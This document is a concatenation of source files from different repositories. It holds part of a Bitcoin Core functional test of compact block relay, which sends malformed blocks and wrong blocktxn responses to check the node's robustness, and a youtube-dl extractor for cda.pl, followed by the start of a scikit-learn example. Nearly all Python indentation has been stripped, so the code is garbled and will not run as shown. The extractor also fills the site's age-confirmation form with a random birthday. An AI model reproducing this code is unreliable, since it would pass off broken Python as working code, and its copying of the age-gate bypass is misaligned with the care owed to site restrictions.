block_hash = int(node.generate(1)[0], 16)
# Store the raw block in our internal format.
        block = FromHex(CBlock(), node.getblock("%064x" % block_hash, False))
for tx in block.vtx:
tx.calc_sha256()
block.rehash()
# Wait until the block was announced (via compact blocks)
wait_until(test_node.received_block_announcement, timeout=30, lock=mininode_lock)
# Now fetch and check the compact block
header_and_shortids = None
with mininode_lock:
assert("cmpctblock" in test_node.last_message)
# Convert the on-the-wire representation to absolute indexes
header_and_shortids = HeaderAndShortIDs(test_node.last_message["cmpctblock"].header_and_shortids)
self.check_compactblock_construction_from_block(version, header_and_shortids, block_hash, block)
# Now fetch the compact block using a normal non-announce getdata
with mininode_lock:
test_node.clear_block_announcement()
inv = CInv(4, block_hash) # 4 == "CompactBlock"
test_node.send_message(msg_getdata([inv]))
wait_until(test_node.received_block_announcement, timeout=30, lock=mininode_lock)
# Now fetch and check the compact block
header_and_shortids = None
with mininode_lock:
assert("cmpctblock" in test_node.last_message)
# Convert the on-the-wire representation to absolute indexes
header_and_shortids = HeaderAndShortIDs(test_node.last_message["cmpctblock"].header_and_shortids)
self.check_compactblock_construction_from_block(version, header_and_shortids, block_hash, block)
def check_compactblock_construction_from_block(self, version, header_and_shortids, block_hash, block):
# Check that we got the right block!
header_and_shortids.header.calc_sha256()
assert_equal(header_and_shortids.header.sha256, block_hash)
# Make sure the prefilled_txn appears to have included the coinbase
assert(len(header_and_shortids.prefilled_txn) >= 1)
assert_equal(header_and_shortids.prefilled_txn[0].index, 0)
# Check that all prefilled_txn entries match what's in the block.
for entry in header_and_shortids.prefilled_txn:
entry.tx.calc_sha256()
# This checks the non-witness parts of the tx agree
assert_equal(entry.tx.sha256, block.vtx[entry.index].sha256)
# And this checks the witness
wtxid = entry.tx.calc_sha256(True)
if version == 2:
assert_equal(wtxid, block.vtx[entry.index].calc_sha256(True))
else:
# Shouldn't have received a witness
assert(entry.tx.wit.is_null())
# Check that the cmpctblock message announced all the transactions.
assert_equal(len(header_and_shortids.prefilled_txn) + len(header_and_shortids.shortids), len(block.vtx))
# And now check that all the shortids are as expected as well.
# Determine the siphash keys to use.
[k0, k1] = header_and_shortids.get_siphash_keys()
index = 0
while index < len(block.vtx):
if (len(header_and_shortids.prefilled_txn) > 0 and
header_and_shortids.prefilled_txn[0].index == index):
# Already checked prefilled transactions above
header_and_shortids.prefilled_txn.pop(0)
else:
tx_hash = block.vtx[index].sha256
if version == 2:
tx_hash = block.vtx[index].calc_sha256(True)
shortid = calculate_shortid(k0, k1, tx_hash)
assert_equal(shortid, header_and_shortids.shortids[0])
header_and_shortids.shortids.pop(0)
index += 1
# Test that bitcoind requests compact blocks when we announce new blocks
# via header or inv, and that responding to getblocktxn causes the block
# to be successfully reconstructed.
# Post-segwit: upgraded nodes would only make this request of cb-version-2,
# NODE_WITNESS peers. Unupgraded nodes would still make this request of
# any cb-version-1-supporting peer.
def test_compactblock_requests(self, node, test_node, version, segwit):
# Try announcing a block with an inv or header, expect a compactblock
# request
for announce in ["inv", "header"]:
block = self.build_block_on_tip(node, segwit=segwit)
with mininode_lock:
test_node.last_message.pop("getdata", None)
if announce == "inv":
test_node.send_message(msg_inv([CInv(2, block.sha256)]))
wait_until(lambda: "getheaders" in test_node.last_message, timeout=30, lock=mininode_lock)
test_node.send_header_for_blocks([block])
else:
test_node.send_header_for_blocks([block])
wait_until(lambda: "getdata" in test_node.last_message, timeout=30, lock=mininode_lock)
assert_equal(len(test_node.last_message["getdata"].inv), 1)
assert_equal(test_node.last_message["getdata"].inv[0].type, 4)
assert_equal(test_node.last_message["getdata"].inv[0].hash, block.sha256)
# Send back a compactblock message that omits the coinbase
comp_block = HeaderAndShortIDs()
comp_block.header = CBlockHeader(block)
comp_block.nonce = 0
[k0, k1] = comp_block.get_siphash_keys()
coinbase_hash = block.vtx[0].sha256
if version == 2:
coinbase_hash = block.vtx[0].calc_sha256(True)
comp_block.shortids = [
calculate_shortid(k0, k1, coinbase_hash) ]
test_node.send_and_ping(msg_cmpctblock(comp_block.to_p2p()))
assert_equal(int(node.getbestblockhash(), 16), block.hashPrevBlock)
# Expect a getblocktxn message.
with mininode_lock:
assert("getblocktxn" in test_node.last_message)
absolute_indexes = test_node.last_message["getblocktxn"].block_txn_request.to_absolute()
assert_equal(absolute_indexes, [0]) # should be a coinbase request
# Send the coinbase, and verify that the tip advances.
if version == 2:
msg = msg_witness_blocktxn()
else:
msg = msg_blocktxn()
msg.block_transactions.blockhash = block.sha256
msg.block_transactions.transactions = [block.vtx[0]]
test_node.send_and_ping(msg)
assert_equal(int(node.getbestblockhash(), 16), block.sha256)
# Create a chain of transactions from given utxo, and add to a new block.
def build_block_with_transactions(self, node, utxo, num_transactions):
block = self.build_block_on_tip(node)
for i in range(num_transactions):
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(utxo[0], utxo[1]), b''))
tx.vout.append(CTxOut(utxo[2] - 1000, CScript([OP_TRUE])))
tx.rehash()
utxo = [tx.sha256, 0, tx.vout[0].nValue]
block.vtx.append(tx)
block.hashMerkleRoot = block.calc_merkle_root()
block.solve()
return block
# Test that we only receive getblocktxn requests for transactions that the
# node needs, and that responding to them causes the block to be
# reconstructed.
def test_getblocktxn_requests(self, node, test_node, version):
with_witness = (version==2)
def test_getblocktxn_response(compact_block, peer, expected_result):
msg = msg_cmpctblock(compact_block.to_p2p())
peer.send_and_ping(msg)
with mininode_lock:
assert("getblocktxn" in peer.last_message)
absolute_indexes = peer.last_message["getblocktxn"].block_txn_request.to_absolute()
assert_equal(absolute_indexes, expected_result)
def test_tip_after_message(node, peer, msg, tip):
peer.send_and_ping(msg)
assert_equal(int(node.getbestblockhash(), 16), tip)
# First try announcing compactblocks that won't reconstruct, and verify
# that we receive getblocktxn messages back.
utxo = self.utxos.pop(0)
block = self.build_block_with_transactions(node, utxo, 5)
self.utxos.append([block.vtx[-1].sha256, 0, block.vtx[-1].vout[0].nValue])
comp_block = HeaderAndShortIDs()
comp_block.initialize_from_block(block, use_witness=with_witness)
test_getblocktxn_response(comp_block, test_node, [1, 2, 3, 4, 5])
msg_bt = msg_blocktxn()
if with_witness:
msg_bt = msg_witness_blocktxn() # serialize with witnesses
msg_bt.block_transactions = BlockTransactions(block.sha256, block.vtx[1:])
test_tip_after_message(node, test_node, msg_bt, block.sha256)
utxo = self.utxos.pop(0)
block = self.build_block_with_transactions(node, utxo, 5)
self.utxos.append([block.vtx[-1].sha256, 0, block.vtx[-1].vout[0].nValue])
# Now try interspersing the prefilled transactions
comp_block.initialize_from_block(block, prefill_list=[0, 1, 5], use_witness=with_witness)
test_getblocktxn_response(comp_block, test_node, [2, 3, 4])
msg_bt.block_transactions = BlockTransactions(block.sha256, block.vtx[2:5])
test_tip_after_message(node, test_node, msg_bt, block.sha256)
# Now try giving one transaction ahead of time.
utxo = self.utxos.pop(0)
block = self.build_block_with_transactions(node, utxo, 5)
self.utxos.append([block.vtx[-1].sha256, 0, block.vtx[-1].vout[0].nValue])
test_node.send_and_ping(msg_tx(block.vtx[1]))
assert(block.vtx[1].hash in node.getrawmempool())
# Prefill 4 out of the 6 transactions, and verify that only the one
# that was not in the mempool is requested.
comp_block.initialize_from_block(block, prefill_list=[0, 2, 3, 4], use_witness=with_witness)
test_getblocktxn_response(comp_block, test_node, [5])
msg_bt.block_transactions = BlockTransactions(block.sha256, [block.vtx[5]])
test_tip_after_message(node, test_node, msg_bt, block.sha256)
# Now provide all transactions to the node before the block is
# announced and verify reconstruction happens immediately.
utxo = self.utxos.pop(0)
block = self.build_block_with_transactions(node, utxo, 10)
self.utxos.append([block.vtx[-1].sha256, 0, block.vtx[-1].vout[0].nValue])
for tx in block.vtx[1:]:
test_node.send_message(msg_tx(tx))
test_node.sync_with_ping()
# Make sure all transactions were accepted.
mempool = node.getrawmempool()
for tx in block.vtx[1:]:
assert(tx.hash in mempool)
# Clear out last request.
with mininode_lock:
test_node.last_message.pop("getblocktxn", None)
# Send compact block
comp_block.initialize_from_block(block, prefill_list=[0], use_witness=with_witness)
test_tip_after_message(node, test_node, msg_cmpctblock(comp_block.to_p2p()), block.sha256)
with mininode_lock:
# Shouldn't have gotten a request for any transaction
assert("getblocktxn" not in test_node.last_message)
# Incorrectly responding to a getblocktxn shouldn't cause the block to be
# permanently failed.
def test_incorrect_blocktxn_response(self, node, test_node, version):
if (len(self.utxos) == 0):
self.make_utxos()
utxo = self.utxos.pop(0)
block = self.build_block_with_transactions(node, utxo, 10)
self.utxos.append([block.vtx[-1].sha256, 0, block.vtx[-1].vout[0].nValue])
# Relay the first 5 transactions from the block in advance
for tx in block.vtx[1:6]:
test_node.send_message(msg_tx(tx))
test_node.sync_with_ping()
# Make sure all transactions were accepted.
mempool = node.getrawmempool()
for tx in block.vtx[1:6]:
assert(tx.hash in mempool)
# Send compact block
comp_block = HeaderAndShortIDs()
comp_block.initialize_from_block(block, prefill_list=[0], use_witness=(version == 2))
test_node.send_and_ping(msg_cmpctblock(comp_block.to_p2p()))
absolute_indexes = []
with mininode_lock:
assert("getblocktxn" in test_node.last_message)
absolute_indexes = test_node.last_message["getblocktxn"].block_txn_request.to_absolute()
assert_equal(absolute_indexes, [6, 7, 8, 9, 10])
# Now give an incorrect response.
# Note that it's possible for bitcoind to be smart enough to know we're
# lying, since it could check to see if the shortid matches what we're
# sending, and eg disconnect us for misbehavior. If that behavior
# change were made, we could just modify this test by having a
# different peer provide the block further down, so that we're still
# verifying that the block isn't marked bad permanently. This is good
# enough for now.
msg = msg_blocktxn()
if version==2:
msg = msg_witness_blocktxn()
msg.block_transactions = BlockTransactions(block.sha256, [block.vtx[5]] + block.vtx[7:])
test_node.send_and_ping(msg)
# Tip should not have updated
assert_equal(int(node.getbestblockhash(), 16), block.hashPrevBlock)
# We should receive a getdata request
wait_until(lambda: "getdata" in test_node.last_message, timeout=10, lock=mininode_lock)
assert_equal(len(test_node.last_message["getdata"].inv), 1)
assert(test_node.last_message["getdata"].inv[0].type == 2 or test_node.last_message["getdata"].inv[0].type == 2|MSG_WITNESS_FLAG)
assert_equal(test_node.last_message["getdata"].inv[0].hash, block.sha256)
# Deliver the block
if version==2:
test_node.send_and_ping(msg_witness_block(block))
else:
test_node.send_and_ping(msg_block(block))
assert_equal(int(node.getbestblockhash(), 16), block.sha256)
def test_getblocktxn_handler(self, node, test_node, version):
# bitcoind will not send blocktxn responses for blocks whose height is
# more than 10 blocks deep.
MAX_GETBLOCKTXN_DEPTH = 10
chain_height = node.getblockcount()
current_height = chain_height
while (current_height >= chain_height - MAX_GETBLOCKTXN_DEPTH):
block_hash = node.getblockhash(current_height)
block = FromHex(CBlock(), node.getblock(block_hash, False))
msg = msg_getblocktxn()
msg.block_txn_request = BlockTransactionsRequest(int(block_hash, 16), [])
num_to_request = random.randint(1, len(block.vtx))
msg.block_txn_request.from_absolute(sorted(random.sample(range(len(block.vtx)), num_to_request)))
test_node.send_message(msg)
wait_until(lambda: "blocktxn" in test_node.last_message, timeout=10, lock=mininode_lock)
[tx.calc_sha256() for tx in block.vtx]
with mininode_lock:
assert_equal(test_node.last_message["blocktxn"].block_transactions.blockhash, int(block_hash, 16))
all_indices = msg.block_txn_request.to_absolute()
for index in all_indices:
tx = test_node.last_message["blocktxn"].block_transactions.transactions.pop(0)
tx.calc_sha256()
assert_equal(tx.sha256, block.vtx[index].sha256)
if version == 1:
# Witnesses should have been stripped
assert(tx.wit.is_null())
else:
# Check that the witness matches
assert_equal(tx.calc_sha256(True), block.vtx[index].calc_sha256(True))
test_node.last_message.pop("blocktxn", None)
current_height -= 1
# Next request should send a full block response, as we're past the
# allowed depth for a blocktxn response.
block_hash = node.getblockhash(current_height)
msg.block_txn_request = BlockTransactionsRequest(int(block_hash, 16), [0])
with mininode_lock:
test_node.last_message.pop("block", None)
test_node.last_message.pop("blocktxn", None)
test_node.send_and_ping(msg)
with mininode_lock:
test_node.last_message["block"].block.calc_sha256()
assert_equal(test_node.last_message["block"].block.sha256, int(block_hash, 16))
assert "blocktxn" not in test_node.last_message
def test_compactblocks_not_at_tip(self, node, test_node):
# Test that requesting old compactblocks doesn't work.
MAX_CMPCTBLOCK_DEPTH = 5
new_blocks = []
for i in range(MAX_CMPCTBLOCK_DEPTH + 1):
test_node.clear_block_announcement()
new_blocks.append(node.generate(1)[0])
wait_until(test_node.received_block_announcement, timeout=30, lock=mininode_lock)
test_node.clear_block_announcement()
test_node.send_message(msg_getdata([CInv(4, int(new_blocks[0], 16))]))
wait_until(lambda: "cmpctblock" in test_node.last_message, timeout=30, lock=mininode_lock)
test_node.clear_block_announcement()
node.generate(1)
wait_until(test_node.received_block_announcement, timeout=30, lock=mininode_lock)
test_node.clear_block_announcement()
with mininode_lock:
test_node.last_message.pop("block", None)
test_node.send_message(msg_getdata([CInv(4, int(new_blocks[0], 16))]))
wait_until(lambda: "block" in test_node.last_message, timeout=30, lock=mininode_lock)
with mininode_lock:
test_node.last_message["block"].block.calc_sha256()
assert_equal(test_node.last_message["block"].block.sha256, int(new_blocks[0], 16))
# Generate an old compactblock, and verify that it's not accepted.
cur_height = node.getblockcount()
hashPrevBlock = int(node.getblockhash(cur_height-5), 16)
block = self.build_block_on_tip(node)
block.hashPrevBlock = hashPrevBlock
block.solve()
comp_block = HeaderAndShortIDs()
comp_block.initialize_from_block(block)
test_node.send_and_ping(msg_cmpctblock(comp_block.to_p2p()))
tips = node.getchaintips()
found = False
for x in tips:
if x["hash"] == block.hash:
assert_equal(x["status"], "headers-only")
found = True
break
assert(found)
# Requesting this block via getblocktxn should silently fail
# (to avoid fingerprinting attacks).
msg = msg_getblocktxn()
msg.block_txn_request = BlockTransactionsRequest(block.sha256, [0])
with mininode_lock:
test_node.last_message.pop("blocktxn", None)
test_node.send_and_ping(msg)
with mininode_lock:
assert "blocktxn" not in test_node.last_message
def activate_segwit(self, node):
node.generate(144*3)
assert_equal(get_bip9_status(node, "segwit")["status"], 'active')
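    # Submit a block directly to the node and check that every listening peer announces it as a compact block.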
def test_end_to_end_block_relay(self, node, listeners):
utxo = self.utxos.pop(0)
block = self.build_block_with_transactions(node, utxo, 10)
[l.clear_block_announcement() for l in listeners]
# ToHex() won't serialize with witness, but this block has no witnesses
# anyway. TODO: repeat this test with witness tx's to a segwit node.
node.submitblock(ToHex(block))
for l in listeners:
wait_until(lambda: l.received_block_announcement(), timeout=30, lock=mininode_lock)
with mininode_lock:
for l in listeners:
assert "cmpctblock" in l.last_message
l.last_message["cmpctblock"].header_and_shortids.header.calc_sha256()
assert_equal(l.last_message["cmpctblock"].header_and_shortids.header.sha256, block.sha256)
# Test that we don't get disconnected if we relay a compact block with valid header,
# but invalid transactions.
def test_invalid_tx_in_compactblock(self, node, test_node, use_segwit):
assert(len(self.utxos))
utxo = self.utxos[0]
block = self.build_block_with_transactions(node, utxo, 5)
del block.vtx[3]
block.hashMerkleRoot = block.calc_merkle_root()
if use_segwit:
# If we're testing with segwit, also drop the coinbase witness,
# but include the witness commitment.
add_witness_commitment(block)
block.vtx[0].wit.vtxinwit = []
block.solve()
# Now send the compact block with all transactions prefilled, and
# verify that we don't get disconnected.
comp_block = HeaderAndShortIDs()
comp_block.initialize_from_block(block, prefill_list=[0, 1, 2, 3, 4], use_witness=use_segwit)
msg = msg_cmpctblock(comp_block.to_p2p())
test_node.send_and_ping(msg)
# Check that the tip didn't advance
        assert(int(node.getbestblockhash(), 16) != block.sha256)
test_node.sync_with_ping()
# Helper for enabling cb announcements
# Send the sendcmpct request and sync headers
def request_cb_announcements(self, peer, node, version):
tip = node.getbestblockhash()
peer.get_headers(locator=[int(tip, 16)], hashstop=0)
msg = msg_sendcmpct()
msg.version = version
msg.announce = True
peer.send_and_ping(msg)
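    # Check that a compact block announced by one peer can be reconstructed with transactions and blocktxn data supplied by a different peer.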
def test_compactblock_reconstruction_multiple_peers(self, node, stalling_peer, delivery_peer):
assert(len(self.utxos))
def announce_cmpct_block(node, peer):
utxo = self.utxos.pop(0)
block = self.build_block_with_transactions(node, utxo, 5)
cmpct_block = HeaderAndShortIDs()
cmpct_block.initialize_from_block(block)
msg = msg_cmpctblock(cmpct_block.to_p2p())
peer.send_and_ping(msg)
with mininode_lock:
assert "getblocktxn" in peer.last_message
return block, cmpct_block
block, cmpct_block = announce_cmpct_block(node, stalling_peer)
for tx in block.vtx[1:]:
delivery_peer.send_message(msg_tx(tx))
delivery_peer.sync_with_ping()
mempool = node.getrawmempool()
for tx in block.vtx[1:]:
assert(tx.hash in mempool)
delivery_peer.send_and_ping(msg_cmpctblock(cmpct_block.to_p2p()))
assert_equal(int(node.getbestblockhash(), 16), block.sha256)
self.utxos.append([block.vtx[-1].sha256, 0, block.vtx[-1].vout[0].nValue])
# Now test that delivering an invalid compact block won't break relay
block, cmpct_block = announce_cmpct_block(node, stalling_peer)
for tx in block.vtx[1:]:
delivery_peer.send_message(msg_tx(tx))
delivery_peer.sync_with_ping()
cmpct_block.prefilled_txn[0].tx.wit.vtxinwit = [ CTxInWitness() ]
cmpct_block.prefilled_txn[0].tx.wit.vtxinwit[0].scriptWitness.stack = [ser_uint256(0)]
cmpct_block.use_witness = True
delivery_peer.send_and_ping(msg_cmpctblock(cmpct_block.to_p2p()))
assert(int(node.getbestblockhash(), 16) != block.sha256)
msg = msg_blocktxn()
msg.block_transactions.blockhash = block.sha256
msg.block_transactions.transactions = block.vtx[1:]
stalling_peer.send_and_ping(msg)
assert_equal(int(node.getbestblockhash(), 16), block.sha256)
def run_test(self):
# Setup the p2p connections and start up the network thread.
self.test_node = TestNode()
self.segwit_node = TestNode()
self.old_node = TestNode() # version 1 peer <--> segwit node
connections = []
connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], self.test_node))
connections.append(NodeConn('127.0.0.1', p2p_port(1), self.nodes[1],
self.segwit_node, services=NODE_NETWORK|NODE_WITNESS))
connections.append(NodeConn('127.0.0.1', p2p_port(1), self.nodes[1],
self.old_node, services=NODE_NETWORK))
self.test_node.add_connection(connections[0])
self.segwit_node.add_connection(connections[1])
self.old_node.add_connection(connections[2])
NetworkThread().start() # Start up network handling in another thread
# Test logic begins here
self.test_node.wait_for_verack()
# We will need UTXOs to construct transactions in later tests.
self.make_utxos()
self.log.info("Running tests, pre-segwit activation:")
self.log.info("Testing SENDCMPCT p2p message... ")
self.test_sendcmpct(self.nodes[0], self.test_node, 1)
sync_blocks(self.nodes)
self.test_sendcmpct(self.nodes[1], self.segwit_node, 2, old_node=self.old_node)
sync_blocks(self.nodes)
self.log.info("Testing compactblock construction...")
self.test_compactblock_construction(self.nodes[0], self.test_node, 1, False)
sync_blocks(self.nodes)
self.test_compactblock_construction(self.nodes[1], self.segwit_node, 2, False)
sync_blocks(self.nodes)
self.log.info("Testing compactblock requests... ")
self.test_compactblock_requests(self.nodes[0], self.test_node, 1, False)
sync_blocks(self.nodes)
self.test_compactblock_requests(self.nodes[1], self.segwit_node, 2, False)
sync_blocks(self.nodes)
self.log.info("Testing getblocktxn requests...")
self.test_getblocktxn_requests(self.nodes[0], self.test_node, 1)
sync_blocks(self.nodes)
self.test_getblocktxn_requests(self.nodes[1], self.segwit_node, 2)
sync_blocks(self.nodes)
self.log.info("Testing getblocktxn handler...")
self.test_getblocktxn_handler(self.nodes[0], self.test_node, 1)
sync_blocks(self.nodes)
self.test_getblocktxn_handler(self.nodes[1], self.segwit_node, 2)
self.test_getblocktxn_handler(self.nodes[1], self.old_node, 1)
sync_blocks(self.nodes)
self.log.info("Testing compactblock requests/announcements not at chain tip...")
self.test_compactblocks_not_at_tip(self.nodes[0], self.test_node)
sync_blocks(self.nodes)
self.test_compactblocks_not_at_tip(self.nodes[1], self.segwit_node)
self.test_compactblocks_not_at_tip(self.nodes[1], self.old_node)
sync_blocks(self.nodes)
self.log.info("Testing handling of incorrect blocktxn responses...")
self.test_incorrect_blocktxn_response(self.nodes[0], self.test_node, 1)
sync_blocks(self.nodes)
self.test_incorrect_blocktxn_response(self.nodes[1], self.segwit_node, 2)
sync_blocks(self.nodes)
# End-to-end block relay tests
self.log.info("Testing end-to-end block relay...")
self.request_cb_announcements(self.test_node, self.nodes[0], 1)
self.request_cb_announcements(self.old_node, self.nodes[1], 1)
self.request_cb_announcements(self.segwit_node, self.nodes[1], 2)
self.test_end_to_end_block_relay(self.nodes[0], [self.segwit_node, self.test_node, self.old_node])
self.test_end_to_end_block_relay(self.nodes[1], [self.segwit_node, self.test_node, self.old_node])
self.log.info("Testing handling of invalid compact blocks...")
self.test_invalid_tx_in_compactblock(self.nodes[0], self.test_node, False)
self.test_invalid_tx_in_compactblock(self.nodes[1], self.segwit_node, False)
self.test_invalid_tx_in_compactblock(self.nodes[1], self.old_node, False)
self.log.info("Testing reconstructing compact blocks from all peers...")
self.test_compactblock_reconstruction_multiple_peers(self.nodes[1], self.segwit_node, self.old_node)
sync_blocks(self.nodes)
# Advance to segwit activation
self.log.info("Advancing to segwit activation")
self.activate_segwit(self.nodes[1])
self.log.info("Running tests, post-segwit activation...")
self.log.info("Testing compactblock construction...")
self.test_compactblock_construction(self.nodes[1], self.old_node, 1, True)
self.test_compactblock_construction(self.nodes[1], self.segwit_node, 2, True)
sync_blocks(self.nodes)
self.log.info("Testing compactblock requests (unupgraded node)... ")
self.test_compactblock_requests(self.nodes[0], self.test_node, 1, True)
self.log.info("Testing getblocktxn requests (unupgraded node)...")
self.test_getblocktxn_requests(self.nodes[0], self.test_node, 1)
# Need to manually sync node0 and node1, because post-segwit activation,
# node1 will not download blocks from node0.
self.log.info("Syncing nodes...")
assert(self.nodes[0].getbestblockhash() != self.nodes[1].getbestblockhash())
while (self.nodes[0].getblockcount() > self.nodes[1].getblockcount()):
block_hash = self.nodes[0].getblockhash(self.nodes[1].getblockcount()+1)
self.nodes[1].submitblock(self.nodes[0].getblock(block_hash, False))
assert_equal(self.nodes[0].getbestblockhash(), self.nodes[1].getbestblockhash())
self.log.info("Testing compactblock requests (segwit node)... ")
self.test_compactblock_requests(self.nodes[1], self.segwit_node, 2, True)
self.log.info("Testing getblocktxn requests (segwit node)...")
self.test_getblocktxn_requests(self.nodes[1], self.segwit_node, 2)
sync_blocks(self.nodes)
self.log.info("Testing getblocktxn handler (segwit node should return witnesses)...")
self.test_getblocktxn_handler(self.nodes[1], self.segwit_node, 2)
self.test_getblocktxn_handler(self.nodes[1], self.old_node, 1)
# Test that if we submitblock to node1, we'll get a compact block
# announcement to all peers.
# (Post-segwit activation, blocks won't propagate from node0 to node1
# automatically, so don't bother testing a block announced to node0.)
self.log.info("Testing end-to-end block relay...")
self.request_cb_announcements(self.test_node, self.nodes[0], 1)
self.request_cb_announcements(self.old_node, self.nodes[1], 1)
self.request_cb_announcements(self.segwit_node, self.nodes[1], 2)
self.test_end_to_end_block_relay(self.nodes[1], [self.segwit_node, self.test_node, self.old_node])
self.log.info("Testing handling of invalid compact blocks...")
self.test_invalid_tx_in_compactblock(self.nodes[0], self.test_node, False)
self.test_invalid_tx_in_compactblock(self.nodes[1], self.segwit_node, True)
self.test_invalid_tx_in_compactblock(self.nodes[1], self.old_node, True)
self.log.info("Testing invalid index in cmpctblock message...")
self.test_invalid_cmpctblock_message()
if __name__ == '__main__':
CompactBlocksTest().main()
|
yasoob/youtube-dl-GUI | refs/heads/master | youtube_dl/extractor/cda.py | 3 | # coding: utf-8
from __future__ import unicode_literals
import codecs
import re
from .common import InfoExtractor
from ..compat import (
compat_chr,
compat_ord,
compat_urllib_parse_unquote,
)
from ..utils import (
ExtractorError,
float_or_none,
int_or_none,
merge_dicts,
multipart_encode,
parse_duration,
random_birthday,
urljoin,
)
class CDAIE(InfoExtractor):
_VALID_URL = r'https?://(?:(?:www\.)?cda\.pl/video|ebd\.cda\.pl/[0-9]+x[0-9]+)/(?P<id>[0-9a-z]+)'
_BASE_URL = 'http://www.cda.pl/'
_TESTS = [{
'url': 'http://www.cda.pl/video/5749950c',
'md5': '6f844bf51b15f31fae165365707ae970',
'info_dict': {
'id': '5749950c',
'ext': 'mp4',
'height': 720,
'title': 'Oto dlaczego przed zakrętem należy zwolnić.',
'description': 'md5:269ccd135d550da90d1662651fcb9772',
'thumbnail': r're:^https?://.*\.jpg$',
'average_rating': float,
'duration': 39,
'age_limit': 0,
}
}, {
'url': 'http://www.cda.pl/video/57413289',
'md5': 'a88828770a8310fc00be6c95faf7f4d5',
'info_dict': {
'id': '57413289',
'ext': 'mp4',
'title': 'Lądowanie na lotnisku na Maderze',
'description': 'md5:60d76b71186dcce4e0ba6d4bbdb13e1a',
'thumbnail': r're:^https?://.*\.jpg$',
'uploader': 'crash404',
'view_count': int,
'average_rating': float,
'duration': 137,
'age_limit': 0,
}
}, {
# Age-restricted
'url': 'http://www.cda.pl/video/1273454c4',
'info_dict': {
'id': '1273454c4',
'ext': 'mp4',
'title': 'Bronson (2008) napisy HD 1080p',
'description': 'md5:1b6cb18508daf2dc4e0fa4db77fec24c',
'height': 1080,
'uploader': 'boniek61',
'thumbnail': r're:^https?://.*\.jpg$',
'duration': 5554,
'age_limit': 18,
'view_count': int,
'average_rating': float,
},
}, {
'url': 'http://ebd.cda.pl/0x0/5749950c',
'only_matching': True,
}]
def _download_age_confirm_page(self, url, video_id, *args, **kwargs):
form_data = random_birthday('rok', 'miesiac', 'dzien')
form_data.update({'return': url, 'module': 'video', 'module_id': video_id})
data, content_type = multipart_encode(form_data)
return self._download_webpage(
urljoin(url, '/a/validatebirth'), video_id, *args,
data=data, headers={
'Referer': url,
'Content-Type': content_type,
}, **kwargs)
def _real_extract(self, url):
video_id = self._match_id(url)
self._set_cookie('cda.pl', 'cda.player', 'html5')
webpage = self._download_webpage(
self._BASE_URL + '/video/' + video_id, video_id)
if 'Ten film jest dostępny dla użytkowników premium' in webpage:
raise ExtractorError('This video is only available for premium users.', expected=True)
if re.search(r'niedostępn[ey] w(?: |\s+)Twoim kraju\s*<', webpage):
self.raise_geo_restricted()
need_confirm_age = False
if self._html_search_regex(r'(<form[^>]+action="[^"]*/a/validatebirth[^"]*")',
webpage, 'birthday validate form', default=None):
webpage = self._download_age_confirm_page(
url, video_id, note='Confirming age')
need_confirm_age = True
formats = []
uploader = self._search_regex(r'''(?x)
<(span|meta)[^>]+itemprop=(["\'])author\2[^>]*>
(?:<\1[^>]*>[^<]*</\1>|(?!</\1>)(?:.|\n))*?
<(span|meta)[^>]+itemprop=(["\'])name\4[^>]*>(?P<uploader>[^<]+)</\3>
''', webpage, 'uploader', default=None, group='uploader')
view_count = self._search_regex(
r'Odsłony:(?:\s| )*([0-9]+)', webpage,
'view_count', default=None)
average_rating = self._search_regex(
(r'<(?:span|meta)[^>]+itemprop=(["\'])ratingValue\1[^>]*>(?P<rating_value>[0-9.]+)',
r'<span[^>]+\bclass=["\']rating["\'][^>]*>(?P<rating_value>[0-9.]+)'), webpage, 'rating', fatal=False,
group='rating_value')
info_dict = {
'id': video_id,
'title': self._og_search_title(webpage),
'description': self._og_search_description(webpage),
'uploader': uploader,
'view_count': int_or_none(view_count),
'average_rating': float_or_none(average_rating),
'thumbnail': self._og_search_thumbnail(webpage),
'formats': formats,
'duration': None,
'age_limit': 18 if need_confirm_age else 0,
}
info = self._search_json_ld(webpage, video_id, default={})
# Source: https://www.cda.pl/js/player.js?t=1606154898
def decrypt_file(a):
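            # Strip the obfuscation markers, URL-decode, shift the printable ASCII characters, then normalize the host to build the final file URL.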
for p in ('_XDDD', '_CDA', '_ADC', '_CXD', '_QWE', '_Q5', '_IKSDE'):
a = a.replace(p, '')
a = compat_urllib_parse_unquote(a)
b = []
for c in a:
f = compat_ord(c)
b.append(compat_chr(33 + (f + 14) % 94) if 33 <= f and 126 >= f else compat_chr(f))
a = ''.join(b)
a = a.replace('.cda.mp4', '')
for p in ('.2cda.pl', '.3cda.pl'):
a = a.replace(p, '.cda.pl')
if '/upstream' in a:
a = a.replace('/upstream', '.mp4/upstream')
return 'https://' + a
return 'https://' + a + '.mp4'
def extract_format(page, version):
json_str = self._html_search_regex(
r'player_data=(\\?["\'])(?P<player_data>.+?)\1', page,
'%s player_json' % version, fatal=False, group='player_data')
if not json_str:
return
player_data = self._parse_json(
json_str, '%s player_data' % version, fatal=False)
if not player_data:
return
video = player_data.get('video')
if not video or 'file' not in video:
self.report_warning('Unable to extract %s version information' % version)
return
if video['file'].startswith('uggc'):
video['file'] = codecs.decode(video['file'], 'rot_13')
if video['file'].endswith('adc.mp4'):
video['file'] = video['file'].replace('adc.mp4', '.mp4')
elif not video['file'].startswith('http'):
video['file'] = decrypt_file(video['file'])
f = {
'url': video['file'],
}
m = re.search(
r'<a[^>]+data-quality="(?P<format_id>[^"]+)"[^>]+href="[^"]+"[^>]+class="[^"]*quality-btn-active[^"]*">(?P<height>[0-9]+)p',
page)
if m:
f.update({
'format_id': m.group('format_id'),
'height': int(m.group('height')),
})
info_dict['formats'].append(f)
if not info_dict['duration']:
info_dict['duration'] = parse_duration(video.get('duration'))
extract_format(webpage, 'default')
for href, resolution in re.findall(
r'<a[^>]+data-quality="[^"]+"[^>]+href="([^"]+)"[^>]+class="quality-btn"[^>]*>([0-9]+p)',
webpage):
if need_confirm_age:
handler = self._download_age_confirm_page
else:
handler = self._download_webpage
webpage = handler(
urljoin(self._BASE_URL, href), video_id,
'Downloading %s version information' % resolution, fatal=False)
if not webpage:
# Manually report warning because empty page is returned when
# invalid version is requested.
self.report_warning('Unable to download %s version information' % resolution)
continue
extract_format(webpage, resolution)
self._sort_formats(formats)
return merge_dicts(info_dict, info)
|
cainiaocome/scikit-learn | refs/heads/master | examples/model_selection/plot_validation_curve.py | 229 | """
==========================
Plotting Validation Curves
==========================
In this plot you can see the training scores and validation scores of an SVM
for different values of the kernel parameter gamma. For very low values of
gamma, you can see that both the training score and the validation score are
